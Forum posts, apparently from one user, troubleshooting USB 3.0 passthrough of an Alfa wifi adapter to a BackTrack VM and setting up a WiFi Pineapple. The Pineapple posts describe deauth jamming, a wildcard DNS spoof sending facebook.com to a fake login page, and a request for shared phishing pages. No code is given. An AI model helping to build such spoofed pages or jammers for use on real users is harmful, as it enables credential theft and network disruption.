Problem solved, at least on my g75...So either I have just been glancing over it, or the option wasnt there in the beginning. BUT. I updated my bios to the latest available, and decided to try to get the alfa working in vmware as well as virtualbox once again. What I did was look in the bios settings under usb, there is a setting for xhci, auto, enable, or disable....well choose disable. after that, the alfa is now able to connect to vmware as well as virtualbox as it should. hope this helps!

yep, thats what i did, from control panel, uninstall program, Intel USB 3.0 eXtensible Host Controller Driver, uninstall....after removing that and rebooting, i didnt have any power at any of the 4 usb ports...tried vmware just for kicks but it didnt recognise anything either.

just got all giddy that maybe it was gonna be this simple lol....to my dismay, i uninstalled the usb 3.0 drivers and my ports became invisible. no power, no nothing. once i reinstalled the driver, they came back, but still no vm fun yet...thx tho for the input

does anyone have vmware recognizing usb devices through usb 3.0 ports here? i know vmware says they support 3.0, and it should work with linux as guest, but it seems like there are ppl out here with the same issues. i have checked my .vmx file in the bt5 vm, and the line that says usb_xhci.present = "TRUE" is what it should be in order for 3.0 support to work with a linux guest... what confuses me is that wmware "sees" the Alfa as a usb device in the dropdown menu, but when i choose to connect to it and disconnect from the host, i keep getting the error that "it is currently in use". I have disabled all network connections one by one, no change. there does not seem to be any processess running on the host machine that would be holding on to the Alfa. If anyone has something else to possibly try, please chime in.

ALFA AWUS036H, works perfect on the older laptop with usb 2.0, but the g75 only has 3.0 ports. I get the same error if i try to connect the alfa or any other device recognized my vmware. It just tells me that the device is currently in use. I did check the bios options to try to let the ports be only 2.0, but there is no option there.

yes i am aware of the option. that was my problem. I also did do alot of searching before i posted.

well from what ive found, my alfa issue deals with the issue that the os in vmware has no support for usb 3.0. if using a native linux os, there is a fix, however, not in the virtual world. sooo...since all my ports on this great new laptop are 3.0, im sol at the moment. guess back to the old standby for playing around. makes sense now i guess, now that i think of it...my mouse even gives me the same error when trying to connect to the vmware....any thoughts?

is this just something unknown or just so dumb noone wants to tell me why?..:/

update...tried using virtualbox, hoping vmware was just being fussy...no luck. i can see the alfa in the usb devices on the virtualbox, i can add it as a filter, but when i go to connect to it..same deal. i get the error that the connection was unsuccessful because alfa is currently in use. i did disable the connection in windows, no change. running this all on asus g75, i7, 16gb ram, nvidia 670,2x500 ssd in raid 0, windows 7 ultimate....something im missing? didnt have any issues on the old laptop running the same setup on bt5r2...

been having an issue with the alfia wifi adaptors and vmware. bt5r3 is running on vmware and it recognizes the adaptor as it should, however, when i choose to connect to the alfa and disconnect from host, it gives me the error box telling me that it is still in use by the host. occasionally it will also give me a driver error instead. the laptop is using its built in wifi and the alfa is not showing as connected to any networks. any thoughts? after alot of searching i have come up with squat. also bt5 does not show it as connected as of yet.

since the upgrade to 2.6, is anyone else having issues with wifi jammer? on 2.5 i could start the jammer and refresh to see the deauth being sent to different mac addresses, however now on 2.6, all i get is "starting wifi jammer". it just hangs at that point. as far as i can tell, nothing is being deauthed at the moment. tried reflash to 2.5 and it worked. flash to 2.6 and same issues. also tried saving the module to usb as well as internal with the same results. any ideas out there?

dont ya hate it when ya feel like a ...*insert bad word*..spent the last hr or so wondering why my pineapple refused to show me a public ip using the huawei stick. tried EVERYTHING. it just worked the other day and i didnt change anything. ...finally tried something logical...lets see if the laptop can get a connection...turns out, here , at work, in the cornfields...apparenty no tmobile connection lol...guess ill have to check at home. i guess i shoulda realized a flashy green light IS different than a flashy BLUE light afterall...

Has anyone successfully made the usb hotspot sticks with sdcard storage work at the same time? ive done the searching but it seems like the threads on them stopped at that point. currently have a tmobile stick that does work as a connection, however i am not able to use the storage while i am using the internet connection. while connected, the storage does show up under the resources tab, but when i turn dns spoof on, my usb connection turns off and i lose the connection. i suppose what i am asking is do i need to run a hub inorder to have my phish sites stored off the pineapple? itd be convenient if i could use the sdcard storage, perhaps im not setting something up right...?

hey all! ok, so i was wondering if anyone here had some good phish pages to share? and also some direction in learning to create my own. been awhile since ive done coding, but now im looking to refresh and dig deeper. any help is appreciated!

thx for the help, just off work and gave it a try with *facebook.com, it appears to be working on my phone browser, ill try more indepth with the laptop tomorrow. just for knowledge sake, why do you think that the spoof worked at times but then not others? as i understand it, the wildcard sends the request off to redirect.php where it is then either looking to see if "facebook" is part of the request, and if so it will send the request off to the fake facebook.html, else it does nothing and functions as normal. ill try the second fix tomorrow as well to see what it does. off to dream of pineapples now :D

so just tried it again for giggles. it works. sometimes. most of the time it will send my www.whatever.com to www.whatever.com/redirect "whatever" being, well...whatever i put in there. google does come to google sometimes, but then again, it also takes me to google.com/redirect which then leads to the error.php page or just a flickering refresh....plz helllp lol
